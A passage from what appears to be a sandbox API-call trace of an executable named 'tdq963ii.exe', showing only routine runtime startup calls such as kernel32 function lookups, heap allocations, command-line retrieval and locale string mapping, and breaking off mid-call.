lpSystemTimeAsFileTime=0x18ff78 | out: lpSystemTimeAsFileTime=0x18ff78*(dwLowDateTime=0x4172b280, dwHighDateTime=0x1d68287)) [0232.456] GetCurrentThreadId () returned 0xb08 [0232.456] GetCurrentProcessId () returned 0x120 [0232.456] QueryPerformanceCounter (in: lpPerformanceCount=0x18ff70 | out: lpPerformanceCount=0x18ff70*=35279497016) returned 1 [0232.456] GetProcessHeap () returned 0x4f0000 [0232.456] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76d30000 [0232.456] GetProcAddress (hModule=0x76d30000, lpProcName="FlsAlloc") returned 0x76d44f2b [0232.457] GetProcAddress (hModule=0x76d30000, lpProcName="FlsFree") returned 0x76d4359f [0232.457] GetProcAddress (hModule=0x76d30000, lpProcName="FlsGetValue") returned 0x76d41252 [0232.457] GetProcAddress (hModule=0x76d30000, lpProcName="FlsSetValue") returned 0x76d44208 [0232.457] GetProcAddress (hModule=0x76d30000, lpProcName="InitializeCriticalSectionEx") returned 0x76d44d28 [0232.457] GetProcAddress (hModule=0x76d30000, lpProcName="CreateEventExW") returned 0x76dc410b [0232.457] GetProcAddress (hModule=0x76d30000, lpProcName="CreateSemaphoreExW") returned 0x76dc4195 [0232.457] GetProcAddress (hModule=0x76d30000, lpProcName="SetThreadStackGuarantee") returned 0x76d4d31f [0232.457] GetProcAddress (hModule=0x76d30000, lpProcName="CreateThreadpoolTimer") returned 0x76d5ee7e [0232.457] GetProcAddress (hModule=0x76d30000, lpProcName="SetThreadpoolTimer") returned 0x77c8441c [0232.457] GetProcAddress (hModule=0x76d30000, lpProcName="WaitForThreadpoolTimerCallbacks") returned 0x77cac50e [0232.457] GetProcAddress (hModule=0x76d30000, lpProcName="CloseThreadpoolTimer") returned 0x77cac381 [0232.457] GetProcAddress (hModule=0x76d30000, lpProcName="CreateThreadpoolWait") returned 0x76d5f088 [0232.458] GetProcAddress (hModule=0x76d30000, lpProcName="SetThreadpoolWait") returned 0x77c905d7 [0232.458] GetProcAddress (hModule=0x76d30000, lpProcName="CloseThreadpoolWait") returned 0x77caca24 [0232.458] GetProcAddress (hModule=0x76d30000, lpProcName="FlushProcessWriteBuffers") returned 0x77c60b8c [0232.458] GetProcAddress (hModule=0x76d30000, lpProcName="FreeLibraryWhenCallbackReturns") returned 0x77d1fde8 [0232.458] GetProcAddress (hModule=0x76d30000, lpProcName="GetCurrentProcessorNumber") returned 0x77cb1e1d [0232.458] GetProcAddress (hModule=0x76d30000, lpProcName="GetLogicalProcessorInformation") returned 0x76dc4761 [0232.458] GetProcAddress (hModule=0x76d30000, lpProcName="CreateSymbolicLinkW") returned 0x76dbcd11 [0232.458] GetProcAddress (hModule=0x76d30000, lpProcName="SetDefaultDllDirectories") returned 0x0 [0232.459] GetProcAddress (hModule=0x76d30000, lpProcName="EnumSystemLocalesEx") returned 0x76dc424f [0232.459] GetProcAddress (hModule=0x76d30000, lpProcName="CompareStringEx") returned 0x76dc46b1 [0232.459] GetProcAddress (hModule=0x76d30000, lpProcName="GetDateFormatEx") returned 0x76dd6676 [0232.459] GetProcAddress (hModule=0x76d30000, lpProcName="GetLocaleInfoEx") returned 0x76dc4751 [0232.459] GetProcAddress (hModule=0x76d30000, lpProcName="GetTimeFormatEx") returned 0x76dd65f1 [0232.459] GetProcAddress (hModule=0x76d30000, lpProcName="GetUserDefaultLocaleName") returned 0x76dc47c1 [0232.460] GetProcAddress (hModule=0x76d30000, lpProcName="IsValidLocaleName") returned 0x76dc47e1 [0232.460] GetProcAddress (hModule=0x76d30000, lpProcName="LCMapStringEx") returned 0x76dc47f1 [0232.460] GetProcAddress (hModule=0x76d30000, lpProcName="GetCurrentPackageId") returned 0x0 [0232.460] GetProcAddress (hModule=0x76d30000, lpProcName="GetTickCount64") returned 0x76d5eee0 [0232.460] GetProcAddress (hModule=0x76d30000, lpProcName="GetFileInformationByHandleExW") returned 0x0 [0232.460] GetProcAddress (hModule=0x76d30000, lpProcName="SetFileInformationByHandleW") returned 0x0 [0232.461] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x8, Size=0x3bc) returned 0x5070b0 [0232.461] GetCurrentThreadId () returned 0xb08 [0232.461] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x0, Size=0x18) returned 0x507478 [0232.461] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x8, Size=0x800) returned 0x507498 [0232.461] GetStartupInfoW (in: lpStartupInfo=0x18fed8 | out: lpStartupInfo=0x18fed8*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="tdq963ii.exe -accepteula -c Run -y -p extract -nobanner", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x40ad42, hStdOutput=0x76765da3, hStdError=0x0)) [0232.461] GetStdHandle (nStdHandle=0xfffffff6) returned 0x3 [0232.461] GetFileType (hFile=0x3) returned 0x2 [0232.462] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0232.462] GetFileType (hFile=0x7) returned 0x2 [0232.462] GetStdHandle (nStdHandle=0xfffffff4) returned 0xb [0232.462] GetFileType (hFile=0xb) returned 0x2 [0232.462] GetCommandLineW () returned="tdq963ii.exe -accepteula -c Run -y -p extract -nobanner" [0232.463] GetEnvironmentStringsW () returned 0x507ca0* [0232.463] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x0, Size=0xb8c) returned 0x508838 [0232.463] FreeEnvironmentStringsW (penv=0x507ca0) returned 1 [0232.463] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x426ea0, nSize=0x104 | out: lpFilename="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\tdq963ii.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\tdq963ii.exe")) returned 0x32 [0232.463] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x0, Size=0x94) returned 0x507ca0 [0232.463] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x8, Size=0xa0) returned 0x507d40 [0232.463] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x8, Size=0x3e) returned 0x504de0 [0232.463] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x8, Size=0x6c) returned 0x507de8 [0232.463] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x8, Size=0x6e) returned 0x507e60 [0232.463] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x8, Size=0x78) returned 0x4ff910 [0232.463] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x8, Size=0x62) returned 0x507ed8 [0232.463] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x8, Size=0x2e) returned 0x507f48 [0232.463] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x8, Size=0x48) returned 0x507f80 [0232.463] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x8, Size=0x30) returned 0x507fd0 [0232.463] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x8, Size=0x28) returned 0x508008 [0232.463] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x8, Size=0x1a) returned 0x506a80 [0232.463] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x8, Size=0x4a) returned 0x508038 [0232.463] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x8, Size=0x72) returned 0x4ff990 [0232.464] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x8, Size=0x30) returned 0x508090 [0232.464] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x8, Size=0x2e) returned 0x5080c8 [0232.464] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x8, Size=0x1c) returned 0x506aa8 [0232.464] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x8, Size=0xd2) returned 0x508100 [0232.464] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x8, Size=0x7c) returned 0x5081e0 [0232.464] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x8, Size=0x36) returned 0x508268 [0232.464] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x8, Size=0x3a) returned 0x504e28 [0232.464] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x8, Size=0x90) returned 0x5082a8 [0232.464] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x8, Size=0x24) returned 0x508340 [0232.464] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x8, Size=0x30) returned 0x508370 [0232.464] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x8, Size=0x36) returned 0x5083a8 [0232.464] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x8, Size=0x48) returned 0x5083e8 [0232.464] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x8, Size=0x52) returned 0x508438 [0232.464] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x8, Size=0x3c) returned 0x504e70 [0232.464] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x8, Size=0x18) returned 0x508498 [0232.464] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x8, Size=0x82) returned 0x5084b8 [0232.464] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x8, Size=0x2e) returned 0x508548 [0232.464] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x8, Size=0x1e) returned 0x506ad0 [0232.464] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x8, Size=0x2c) returned 0x508580 [0232.464] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x8, Size=0x54) returned 0x5085b8 [0232.464] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x8, Size=0x52) returned 0x508618 [0232.464] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x8, Size=0x2a) returned 0x508678 [0232.464] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x8, Size=0x3c) returned 0x504eb8 [0232.464] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x8, Size=0x54) returned 0x5086b0 [0232.464] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x8, Size=0x24) returned 0x508710 [0232.464] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x8, Size=0x30) returned 0x508740 [0232.464] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x8, Size=0x8c) returned 0x508778 [0232.464] HeapFree (in: hHeap=0x4f0000, dwFlags=0x0, lpMem=0x508838 | out: hHeap=0x4f0000) returned 1 [0232.465] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x8, Size=0x800) returned 0x508810 [0232.465] GetLastError () returned 0x0 [0232.465] SetLastError (dwErrCode=0x0) [0232.465] GetLastError () returned 0x0 [0232.465] SetLastError (dwErrCode=0x0) [0232.465] GetLastError () returned 0x0 [0232.465] SetLastError (dwErrCode=0x0) [0232.465] GetACP () returned 0x4e4 [0232.465] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x0, Size=0x220) returned 0x509018 [0232.465] GetLastError () returned 0x0 [0232.465] SetLastError (dwErrCode=0x0) [0232.465] IsValidCodePage (CodePage=0x4e4) returned 1 [0232.465] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x18fecc | out: lpCPInfo=0x18fecc) returned 1 [0232.465] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x18f994 | out: lpCPInfo=0x18f994) returned 1 [0232.465] GetLastError () returned 0x0 [0232.466] SetLastError (dwErrCode=0x0) [0232.466] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18fda8, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0232.466] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18fda8, cbMultiByte=256, lpWideCharStr=0x18f718, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ") returned 256 [0232.466] GetStringTypeW (in: dwInfoType=0x1, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchSrc=256, lpCharType=0x18f9a8 | out: lpCharType=0x18f9a8) returned 1 [0232.466] GetLastError () returned 0x0 [0232.466] SetLastError (dwErrCode=0x0) [0232.466] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18fda8, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0232.466] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18fda8, cbMultiByte=256, lpWideCharStr=0x18f6e8, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ") returned 256 [0232.466] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x100, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchSrc=256, lpDestStr=0x0, cchDest=0, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=0x0) returned 256 [0232.466] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x100, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchSrc=256, lpDestStr=0x18f4d8, cchDest=256, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰š‹œ\x8dž\x8f\x90‘’“”•–—˜™š›œ\x9džÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿȀ") returned 256 [0232.466] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰š‹œ\x8dž\x8f\x90‘’“”•–—˜™š›œ\x9džÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿȀ", cchWideChar=256, lpMultiByteStr=0x18fca8, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x9a\x8b\x9c\x8d\x9e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9eÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ3\\vväþ\x18", lpUsedDefaultChar=0x0) returned 256 [0232.466] GetLastError () returned 0x0 [0232.466] SetLastError (dwErrCode=0x0) [0232.466] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18fda8, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0232.466] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18fda8, cbMultiByte=256, lpWideCharStr=0x18f6f8, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ") returned 256 [0232.466] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x200, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchSrc=256, lpDestStr=0x0, cchDest=0, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=0x0) returned 256 [0232.466] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x200, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchSrc=256, lpDestStr=0x18f4e8, cchDest=256, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f€\x81‚Ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™Š›Œ\x9dŽŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞŸȀ") returned 256 [0232.466] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f€\x81‚Ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™Š›Œ\x9dŽŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞŸȀ", cchWideChar=256, lpMultiByteStr=0x18fba8, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x8a\x9b\x8c\x9d\x8e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞ\x9f \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x9a\x8b\x9c\x8d\x9e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9eÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ3\\vväþ\x18", lpUsedDefaultChar=0x0) returned 256 [0232.466] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x8, Size=0x80) returned 0x509240 [0232.466] IsProcessorFeaturePresent (ProcessorFeature=0xa) returned 1 [0232.466] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x40f584) returned 0x0 [0232.467] RtlSizeHeap (HeapHandle=0x4f0000, Flags=0x0, MemoryPointer=0x509240) returned 0x80 [0232.467] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76d30000 [0232.467] GetProcAddress (hModule=0x76d30000, lpProcName="IsWow64Process") returned 0x76d4195e [0232.467] GetCurrentProcess () returned 0xffffffff [0232.467] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x18ff34 | out: Wow64Process=0x18ff34) returned 1 [0232.467] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x18fd28, nSize=0x104 | out: lpFilename="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\tdq963ii.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\tdq963ii.exe")) returned 0x32 [0232.467] ExpandEnvironmentStringsW 